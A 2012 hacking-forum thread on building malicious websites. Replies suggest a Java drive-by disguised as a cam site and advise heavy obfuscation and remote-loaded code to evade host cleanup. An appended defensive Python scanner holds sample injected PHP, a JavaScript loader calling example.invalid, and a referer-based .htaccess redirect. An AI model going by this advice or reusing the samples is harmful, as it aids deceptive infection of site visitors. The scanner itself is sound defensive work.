EvilZone
Hacking and Security: m0l0ko, December 26, 2012, 02:58:31 AM
-
Besides my own computers, I've never actually hacked anyone, infected them with malware or done anything of that sort (with the exception of when I was around 12 and played around with Sub7), but I get a great deal of satisfaction from learning how these things work. I practice hacking VMs and computers on my LAN, so all my knowledge so far is focused on LAN-based attacks. I've been making websites for years now, so I'd like to learn about making malicious websites (I've seen Firefox warn me about them, but I still don't even know what they are). Malicious websites that I make myself, not hijacking other sites with XSS etc.
So I'm hoping knowledgeable people here can start filling me in on what malicious websites are. I know that Java applets are very dangerous and I read that the same goes for ActiveX, but I'm wondering more about server-side and browser-side scripts and things like Flash. What kind of malicious things can be done with PHP? I see that security experts always recommend using NoScript to disable JavaScript by default. What kind of malicious things can be done with JavaScript? As for Flash, I have absolutely no experience with ActionScript, but I've heard Flash is what creates those LSO cookies.
-
In PHP you could log your victim's IP address. PHP's uses for malware are somewhat limited due to it being server-side, but you can still have some fun.
In JavaScript you can do some VERY nasty things; Google around for some JS viruses.
You could create a Java drive-by, which will download and execute a file without the user knowing, provided they click the "allow applet" button; you could fool horny men into running it by making it look like a cam site.
The possibilities are endless; you just need some creativity and some programming knowledge.
NoScript is a must; it will stop any JavaScript.
-
95% of the actual malicious code I clean daily is JavaScript. The 5% left over is .htaccess and PHP redirects or PHP shells. Even then, the key to success is carefully meshing the code with the flow of the site to make it appear legitimate. Heavy obfuscation is needed where someone may determine that you put it there. Most hosts won't take the time to decipher it, only remove it. The best way to possibly go about it is actually to pull the code from somewhere else. This makes it much, much harder to track.
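The cleanup side of the post above, as an added example that is not part of the thread: a small Python scanner that scores files for the indicators a host's cleanup pass looks for when triaging injected JavaScript, PHP and .htaccess redirects (eval/decode chains, runs of hex or percent escapes, long opaque literals, referer-conditional rewrites to an external host). The sample files, the indicator list and its weights, and the example.invalid host are all constructed for this example and are not taken from any real compromised site.

```python
import re

# Constructed sample files for this example (not real site content).
SAMPLES = {
    "index.php": (
        "<?php\n"
        "require 'config.php';\n"
        "$page = isset($_GET['p']) ? $_GET['p'] : 'home';\n"
        "echo render_page($page);\n"
    ),
    "footer.php": (
        "<?php\n"
        "/* theme footer */\n"
        "eval(gzinflate(base64_decode('"
        "S0osTs5QKEktLlHQUChILCrRUEjKLClJTFJQyMhMzjBKzM1MUcjJL0pPVNTUBAA=')));\n"
        "?>\n"
    ),
    "app.js": (
        "function init(){document.getElementById('menu').classList.add('open');}\n"
        "document.write(unescape('%3Cscript%20src%3D%22%2F%2Fexample.invalid"
        "%2Fjs%2Fk.js%22%3E%3C%2Fscript%3E'));\n"
        "var _0x1a=['\\x73\\x63\\x72\\x69\\x70\\x74','\\x73\\x72\\x63',"
        "'\\x61\\x70\\x70\\x65\\x6e\\x64\\x43\\x68\\x69\\x6c\\x64'];\n"
    ),
    "theme.js": (
        "function toggleMenu(){var m=document.getElementById('menu');"
        "m.classList.toggle('open');}\n"
    ),
    ".htaccess": (
        "RewriteEngine On\n"
        "RewriteCond %{HTTP_REFERER} (google|bing|yahoo)\\. [NC]\n"
        "RewriteRule ^(.*)$ http://example.invalid/go.php?u=$1 [R=302,L]\n"
    ),
}

# (regex, weight, description). The weights are a judgement call made for
# this example, not a published scoring scheme; tune them to your own corpus.
INDICATORS = [
    (r"\beval\s*\(", 3, "eval()"),
    (r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", 2, "PHP decode/inflate"),
    (r"\bpreg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e['\"]", 3, "preg_replace /e"),
    (r"\$[A-Za-z_]\w*\s*\(", 1, "PHP variable function call"),
    (r"\b(unescape|String\.fromCharCode)\s*\(", 2, "JS string decoding"),
    (r"document\.write\s*\(", 1, "document.write()"),
    (r"(\\x[0-9a-f]{2}){8,}", 2, "run of \\x escapes"),
    (r"(%[0-9a-f]{2}){8,}", 2, "run of %XX escapes"),
    (r"['\"][A-Za-z0-9+/=]{40,}['\"]", 2, "long opaque literal"),
    (r"RewriteCond\s+%\{HTTP_REFERER\}[^\n]*(google|bing|yahoo)", 3, "referer-conditional rewrite"),
    (r"RewriteCond\s+%\{HTTP_USER_AGENT\}[^\n]*(googlebot|bingbot|slurp)", 2, "crawler-conditional rewrite"),
    (r"RewriteRule\s+\S+\s+https?://", 2, "rewrite to external host"),
    (r"ErrorDocument\s+\d{3}\s+https?://", 2, "error page on external host"),
]


def scan_text(text):
    """Score one file's contents: each indicator counts once, plus a bonus
    for a very long whitespace-free line (typical of minified injections)."""
    score, hits = 0, []
    for pattern, weight, desc in INDICATORS:
        if re.search(pattern, text, re.IGNORECASE):
            score += weight
            hits.append(desc)
    if any(len(line) > 400 and " " not in line.strip() for line in text.splitlines()):
        score += 2
        hits.append("very long whitespace-free line")
    return score, hits


def scan_files(files, threshold=4):
    """Return {name: (score, hits)} for files scoring at or above threshold."""
    report = {}
    for name, text in files.items():
        score, hits = scan_text(text)
        if score >= threshold:
            report[name] = (score, hits)
    return report


if __name__ == "__main__":
    for name, (score, hits) in sorted(scan_files(SAMPLES).items()):
        print(f"{name}: score {score}: {', '.join(hits)}")
```

The scanner is deliberately a triage aid, not a verdict: a legitimate minifier or a base64-encoded image can trip the "long opaque literal" and long-line checks, which is why hits are reported alongside the score so that a reviewer can decode the flagged fragment rather than delete on sight. Run it over a file tree by replacing SAMPLES with a dict built from os.walk.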